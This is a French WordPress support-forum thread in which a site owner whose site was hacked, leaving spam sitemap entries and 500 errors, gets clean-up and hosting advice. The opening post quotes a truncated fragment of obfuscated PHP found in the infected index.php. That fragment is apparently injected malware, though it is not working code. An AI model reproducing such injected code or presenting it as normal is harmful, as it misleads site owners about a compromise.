Site inaccessible suite à un piratage

  • WordPress :4.9.8
  • Statut : non résolu
15 sujets de 1 à 15 (sur un total de 54)
  • Auteur
    Messages
  • #2204701
    hikker
    Participant
    Initié WordPress
    37 contributions

    Bonjour,

    Ma configuration WP actuelle

    • Version de PHP/MySQL : 4.1.14.8
    • Thème utilisé : forestly 1.3.3
    • Extensions en place :  Acunetix Secure WordPress 3.0.4, Akismet Anti-Spam 4.0.8, Contact Form 7 4.4.2, Easy WP SMTP 1.0.7, Google Analytics par MonsterInsights 5.5.2, iframe 4.3, Juiz Social Post Sharer 1.4.5, Math Comment Spam Protection 3.0, Page Tagger 0.4.2, Really Simple CAPTCHA 1.7, Redirection 2.4.5, Ultimate Tag Cloud Widget 2.7.2, Yoast SEO 3.4
    • Nom de l’hébergeur : Nuxit
    • Adresse du site : http://www.fabiennecheneau-sophrologie.fr

    Problème(s) rencontré(s) :

    Site inaccessible suite à un piratage. Action nettoyage du site-map.xml qui contenait plein de références de page avec des url en japaonais. J’ai ensuite ajouter le nouveau site-map au moteur de google pour qu’il refasse un référencement de mes pages mais cela me plusieurs jours je crois.

    Contenu du index.php : <?php $z1OYQeXkoA=’*5ww*aR*2wY*bs*2w,#*5ww*aR*2wY*bs*2w#,*5wd*bH*1wJ*aj*5w,#*5wd*bH*1wJ*aj*5w#,I*bk*2wU*aY,#I*bk*2wU*aY ……..?><?php.  : Est-ce normal ? Mais la date du fichier ne correspond pas à la date du piratage.

    Depuis la mise de wordpress : plein d’erreurs 500  Internal Server Error (Could not execute script « /web/fabiennecheneau/www/wp-admin/plugins.php », Could not execute script « /web/fabiennecheneau/www/wp-admin/edit-comments.php » …………) dès que j’essaie de naviguer dans les plugins ou les thèmes, les pages.

    Parfois les erreurs 500 disparaissent quand je réactualise. Mais pas toujours.

    Historiquement j’ai été piraté le 27-08-18.

    Mon fichier .htaccess n’a pas été touché, il date de 2015 mais il n’est surement pas assez sécurisé.

    Merci pour votre aide.

    Olivier

    #2204715
    Noaneo
    Participant
    Maître WordPress
    29479 contributions

    Bonsoir @hikker ,
    La version PHP 4.11.4.8 ?? Vous êtes sûr ? Il faudrait PHP 7.0  au moins.

    Il faut tout supprimer sur le serveur, ne garder que le fichier wp-config.php et le dossier wp-content/uploads
    Envoyer la dernière version de WordPress
    Changer de thème, le votre est obsloète
    https://fr.wordpress.org/themes/forestly/

    Pareil pour les plugins, par exemple
    https://fr.wordpress.org/plugins/secure-wordpress/
    2 ans sans mise à jour, wordpress.org indique ceci :
    « Cette extension n’a pas été testée avec plus de trois mises à jour majeures de WordPress. Elle peut ne plus être maintenue ou supportée et peut avoir des problèmes de compatibilité lorsqu’elle est utilisée avec des versions de WordPress plus récentes. »
    https://wordpress.org/plugins/math-comment-spam-protection/
    https://wordpress.org/plugins/page-tagger/
    https://wordpress.org/plugins/ultimate-tag-cloud-widget/

    Article sur un site piraté, hacké
    https://wpformation.com/wordpress-pirate-hack/

    Créer un nouveau fichier .htaccesss est optimisé
    https://wpmarmite.com/htaccess-wordpress/

    Bon courage

    #2204809
    hikker
    Participant
    Initié WordPress
    37 contributions

    Bonjour Noaneo,

    Merci beaucoup pour votre aide, le site se porte mieux mais je n’ai pas fini il me reste le nettoyage des plugins et leur mise à jour.

    J’ai modifié le htaccess mais si je mets trop de sécurité dessus pourrais-je le modifier moi-même ainsi que les répertoires protégés ?

    Beaucoup de gens me disent que WordPress a trop de failles et que je devrai changer qu’en pensez-vous?

    Olivier.

    #2204810
    Noaneo
    Participant
    Maître WordPress
    29479 contributions

    Bonsoir @hikker ,

    Oui, le fichier .htaccess sera toujours accessible après, pas d’inquiétude.
    Dès qu’une faille de sécurité est détecté, WordPress fait une mise à jour.
    WordPress n’a pas trop de failles, les gens se trompent, c’est le CMS, le plus utilisé, donc c’est le plus attaqué, c’est différent.

    #2204934
    hikker
    Participant
    Initié WordPress
    37 contributions

    PAr contre à chaque fois que je fais une mise à jour d’extensions, j’ai l’erreur suivante :

    La mise à jour a échoué : Le téléchargement a échoué. cURL error 28: gnutls_handshake() failed: A TLS fatal alert has been received.

    Merci

    #2204936
    Noaneo
    Participant
    Maître WordPress
    29479 contributions

    @hikker ,
    Pourquoi une mise à jour ?
    Vous avez bien supprimé tous vos plugins, puis vous avez tout réinstallé au propre ?
    Comme pour WordPress ?
    Et le thème, vous avez bien changé ?

    Sinon pour le message d’erreur, vous êtes chez Nuxit, un problème chez eux, il y a eu une discussion là dessus, il faut passer sous la nouvelle plateforme et être sous PHP7.0
    https://wpfr.net/support/sujet/curl-error-28-gnutls_handshake-failed-a-tls-fatal-alert-has-been-received/
    – Message de Nuxit : 

    « Pour résoudre votre probléme, vous devez faire une migration vers une nouvelle plateforme Révolution pour activer les nouvelles versions Curl et openssl , et cette migration concerne TOUS les sous-domaines de votre abonnement.
    Pour faire cette migration, nous vous invitons de passer tous vos sous-domaines sur la version PHP 5.6 .
    Depuis votre espace client >> Hébergement Mutualisé >> Sous-domaine >> Gérer les sous-domaines >> Sous la rubrique Liste des Sous-Domaines ; Choisissez l’hôte virtuel concerné et cliquez sur le crayon à gauche du sous-domaine en question et veuillez cochez la rubrique Édition de la Configuration de PHP et modifier la version.
    Après avoir passer vos sous-domaines sur la version PHP 5.6, sous Hébergement >> Sous-domaine , sous l’onglet information vous cliquez sur le bouton Migrer vers la nouvelle plateforme Revolution
    Si le problème persiste merci de nous répondre sur ce ticket en indiquant la liste des domaines concernés.

    NB:
    1-une fois la migration vers la nouvelle plateforme est faite vous pouvez avoir que les versions PHP5.6 et PHP7.0 / 7.1 /7.2 et vous ne pouvez pas retourner en arrière.
    2-N’oubliez pas de vérifier la compatibilité de vos codes sources lors du changement de la version PHP »

    #2205145
    hikker
    Participant
    Initié WordPress
    37 contributions

    Bonjour,

    Malgré les actions sur mon sous-domaine pour passer en PHP 5.6 j’ai toujours le même problème avec l’erreur curl…..

    J’ai quand même un ticket au cas où , même si ils ont déjà ce genre d’ouvert chez eux.

    Merci.

    #2205157
    Noaneo
    Participant
    Maître WordPress
    29479 contributions

    Bonjour,
    Vous avez migré vers la nouvelle plateforme Revolution ?

    #2205160
    hikker
    Participant
    Initié WordPress
    37 contributions

    Oui biensur mais la version PHP est limitée à 5.6

    Mais je me demande si je n’ai pas tout intérêt à choisir un aute hébergeur comme EX2 ? Même si mon abonnement prend fin début février.

    #2205164
    Noaneo
    Participant
    Maître WordPress
    29479 contributions

    Bizarre, dans l’autre sujet de discussion, un membre @carolinedessine disait, après avoir migrer sur la nouvelle plateforme
    « Bonne nouvelle ! Une personne de Nuxit a fait la migration de son côté, qui a marché et je peux de nouveau mettre à jour !

    Je peux aussi maintenant passer en PHP 7.0 , PHP 7.1 ou PHP 7.2

    Est-ce que je dois vérifier quelque chose avant de le faire ou je peux faire le changement tranquillement ? »

    Sinon vous pouvez changer d’hébergeur, pourquoi EX2 ?
    il y a Infomaniak, PlanetHoster, etc..

    #2205188
    hikker
    Participant
    Initié WordPress
    37 contributions

    Je ne comprends pas comment il a pu passer à la PHP 7.0 alors dans mon espace de sous  domaine il ne me propose que la 5.6 au maximum .

    #2205194
    Noaneo
    Participant
    Maître WordPress
    29479 contributions

    @hikker ,
    Excusez-moi, juste une vérification, la migration vers la plateforme Revolution a bien été exécutée ? Vous le voyez indiqué sur votre espace client chez Nuxit ?
    Lisez, la suite de la discussion, vous verrez que d’autres sont passés, aussi, sous PHP7.0, PHP7.1
    https://wpfr.net/support/sujet/curl-error-28-gnutls_handshake-failed-a-tls-fatal-alert-has-been-received/page/4/

    Si un hébergeur ne propose pas PHP 7, il faut changer.
    Je demandais pour EX2, suite à la lecture des commentaires là
    https://www.kalagan.fr/ex2hosting-mon-serveur-ovh-en-beaucoup-mieux/

    #2205197
    hikker
    Participant
    Initié WordPress
    37 contributions

    c’est vrai que je me demande si la migration a vraiment été faite car il marque « migration désactivéeé voir la pj.

    Pourtant le bouton est actif.

    Fichiers joints :
    Vous devez être connecté pour voir les fichiers joints.
    #2205257
    Noaneo
    Participant
    Maître WordPress
    29479 contributions

    @hikker ,
    Ah oui, vous n’avez pas migré pour l’instant, cliquer sur le bouton vert « Migrer vers la nouvelle Plateforme (R)évolution.
    Si rien ne change, il faudrait les relancer avec le ticket ouvert.

    #2205269
    hikker
    Participant
    Initié WordPress
    37 contributions

    j’ai déjà fait un ticket et ils l’ont fermé en disant qu’ils allaient prendre l’opération à leur charge.

    du coup je l’ai ré ouvert !

    wait and see.

15 sujets de 1 à 15 (sur un total de 54)
  • Vous devez être connecté pour répondre à ce sujet.